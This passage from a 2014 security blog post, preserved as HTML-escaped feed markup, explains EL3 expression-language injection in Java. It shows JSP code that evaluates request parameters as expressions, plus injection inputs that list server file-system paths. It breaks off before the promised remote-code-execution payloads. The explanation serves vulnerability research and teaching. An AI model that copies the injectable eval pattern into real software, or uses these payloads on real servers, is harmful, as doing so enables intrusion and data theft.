url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc9V2iEbAreZrcxmxBsRJBiA46OvD36NEqxDjLPiMO7GzfltGDiDiv9Ovu0wjtkK2Mlno17-kRlzvow5X8Hm49f6GI1n3g8TKMaf6aWMyN_t1DUOpT11aYIBXH-RDNAWq0HbkPzXax6qQ/s72-c/wafep_logo_big.png" height="72" width="72"/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3792178847867987053.post-7411966009291787493</id><published>2014-12-17T04:13:00.003-08:00</published><updated>2014-12-18T11:17:29.244-08:00</updated><title type='text'>EL 3.0/Lambda Injection: Hacker Friendly Java</title><content type='html'>&lt;div class=&quot;MsoNormal&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;&lt;a href=&quot;https://www.blogger.com/blogger.g?blogID=3792178847867987053&quot; imageanchor=&quot;1&quot; style=&quot;clear: right; float: right; margin-bottom: 1em; margin-left: 1em;&quot;&gt;&lt;/a&gt;The following article explains the mechanics of a code injection attack
called &lt;b&gt;EL3 Injection&lt;/b&gt; in applications that make use of the relatively new
&lt;b&gt;EL3 processor&lt;/b&gt; in java. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
New mechanics and operators introduced in EL3 make the discovery and
exploitation of this exposure almost as easy and seamless as SQL Injection, and
the impact of the vulnerability is severe, with potential impacts such as
denial of service, information theft and even remote code execution.&lt;br /&gt;
&lt;br /&gt;
Since the EL3 technology is relatively new it&#39;s probably not (YET) as common as other severe exposures, but at the very least, it will put a big wide &lt;b&gt;&lt;i&gt;THEY DID WHAAAAT!?&lt;/i&gt;&lt;/b&gt; smile on your face.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;[Note –&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;The following article discusses a generic application-level coding flaw in modern Java applications, NOT a java 0-day.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Keep on reading – the juicier RCE payloads
are presented at the end]&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
While trying to (&lt;b&gt;and&lt;/b&gt; &lt;b&gt;miserably failing at&lt;/b&gt;) create a training
kit for &lt;a href=&quot;https://www.owasp.org/index.php/Expression_Language_Injection&quot;&gt;&lt;b&gt;EL
Injection&lt;/b&gt;&lt;/a&gt; (or Spring EL Injection, &lt;b&gt;JSR245&lt;/b&gt;, if you will),
published by &lt;a href=&quot;http://blog.mindedsecurity.com/2011/09/expression-language-injection.html&quot;&gt;&lt;b&gt;Stefano
Di Paola&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Arshan Dabirsiaghi, &lt;/b&gt;I spent some time trying to get
a working build of the eclipse-based STS IDE version which supported the vulnerable
Java Spring MVC versions (Spring 3.0.0-3.0.5).&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Turns out that someone did a &lt;b&gt;REALLY GOOD&lt;/b&gt; job eradicating every
trace of the vulnerable builds, leaving only time consuming options of compiling
the environment from scratch.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Luckily, at some point, I decided to take a short break, and read about
the &lt;b&gt;relatively&lt;/b&gt; &lt;b&gt;new &lt;/b&gt;&lt;a href=&quot;http://www.infoq.com/news/2013/07/el3&quot;&gt;&lt;b&gt;EL
in Java&lt;/b&gt;&lt;/a&gt; (&lt;b&gt;JSR341&lt;/b&gt;, not necessarily in Java Spring) – and found
something &lt;b&gt;VERY&lt;/b&gt; interesting.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Turns out that the newest java expression language version, &lt;b&gt;EL 3.0&lt;/b&gt;
(published sometime in &lt;a href=&quot;http://download.oracle.com/otn-pub/jcp/el-3_0-fr-eval-spec/EL3.0.FR.pdf?AuthParam=1418816983_120b2e34100c78bacc37b8e9484a671c&quot;&gt;2013&lt;/a&gt;),
includes multiple enhancements, such as operators, security restrictions on
class access, and so on.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
A typical source code sample of using &lt;b&gt;EL3&lt;/b&gt; in a Servlet or JSP
page would look something like:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  msg = elp.eval(&quot;&lt;b&gt;&lt;span style=&quot;color: #7030a0;&quot;&gt;&#39;Welcome&#39;&lt;/span&gt;&lt;/b&gt; &lt;b&gt;+&lt;/b&gt;
  &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;user.name&lt;/span&gt;&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(msg.toString());&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
The ELProcessor dynamically evaluates the EL statement, and attempts to
access the &quot;&lt;b&gt;name&lt;/b&gt;&quot; fields of the Bean (or registered class) &lt;b&gt;user&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
After taking a couple of shots at &quot;guessing&quot; objects that
might be accessible by default, I stumbled on one of the features that can be
used to define access to classes in EL3, which includes the ELManager class
methods &lt;b&gt;importClass&lt;/b&gt;, &lt;b&gt;importPackage&lt;/b&gt; and &lt;b&gt;importStatic&lt;/b&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
These methods could be used to &quot;import&quot; various classes and
even packages into the scope of the expression language, so they could be
referenced within expressions.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
So in order to use classes in EL3 expressions, you&#39;ll need to include
them using statements such as –&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
elp.getELManager().importClass(&quot;java.io.File&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
This feature was implemented due to &lt;b&gt;safety concerns&lt;/b&gt; (or in other
words, &lt;b&gt;security&lt;/b&gt;), to make sure that access to classes is presumably prevented
for any class that was not also included in the page/project original EL imports
AND application imports, so that even if developers will enable user input to
affect the &quot;importPackage&quot; or &quot;importClass&quot; statements, the
external effect will be limited to the classes already imported in the context.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
However, since many interesting classes and packages are typically used
in Servlets and JSP pages, an attacker can still abuse this feature in multiple
scenarios –&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
(1) If the developer already imported a class that the attacker needs
into the EL context, and an attacker controlled input is used within the
expression evaluation:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;File.listRoots()[0].getAbsolutePath()&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
elp.getELManager().importClass(&quot;&lt;b&gt;java.io.File&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  path = elp.eval(&lt;b&gt;input1&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(path);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
(2) If the developer enabled the user to control the importClass/Package
statement (no limits to human stupidity, right?), and already has a wide enough
scope imported in the page/application imports:&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input1&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;File.listRoots()[0].listFiles()[1].getAbsolutePath()&lt;/span&gt;&lt;/b&gt;&quot;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;Input2&lt;/b&gt;
  = &quot;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;java.io.File&lt;/span&gt;&quot;;&lt;/b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 414.8pt;&quot; valign=&quot;top&quot; width=&quot;691&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELProcessor&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%@page
  import=&quot;javax.el.ELManager&quot;%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
…&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&amp;lt;%&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input1&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input1&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
String &lt;b&gt;input2&lt;/b&gt;
  = request.getParameter(&quot;&lt;b&gt;input2&lt;/b&gt;&quot;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
ELProcessor
  elp = new ELProcessor();&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
elp.getELManager().importClass(&lt;b&gt;Input2&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
Object
  path = elp.eval(&lt;b&gt;input1&lt;/b&gt;);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
out.println(path);&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
%&amp;gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIqqZVL38FOYvQOOmTBCNZi3aHvPYqBqhuLDnXxgnR8i3hXXYovtuIHy6W_zvacUe5nuv1yvyLr4emaB8Wv2Hj54ciz7MLAsoHLBT6Ag7oqlM_m1z0hj6FZBKJbYO0ATi25y6VNcsoQE/s1600/javaprocnumber.png&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFIqqZVL38FOYvQOOmTBCNZi3aHvPYqBqhuLDnXxgnR8i3hXXYovtuIHy6W_zvacUe5nuv1yvyLr4emaB8Wv2Hj54ciz7MLAsoHLBT6Ag7oqlM_m1z0hj6FZBKJbYO0ATi25y6VNcsoQE/s1600/javaprocnumber.png&quot; height=&quot;54&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;o:p&gt;&lt;br /&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
So, here you go.&lt;br /&gt;
A nice exploit that will probably affect a couple of
desolate apps, with super insecure code. Hardly worth its own classification. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
However, while trying to squeeze some more juice out of the potential
attack vector, I stumbled upon the following &lt;a href=&quot;https://www.youtube.com/watch?v=JEKpRjXL06w&quot;&gt;&lt;b&gt;video&lt;/b&gt;&lt;/a&gt;, which
explains the features of &lt;b&gt;EL3&lt;/b&gt; in great details.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
To make a long story short, watch the video and skip to &lt;b&gt;7:52&lt;/b&gt;. &lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
It&#39;s well worth your time.&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; unicode-bidi: embed;&quot;&gt;
Turns out that despite the security restrictions that required
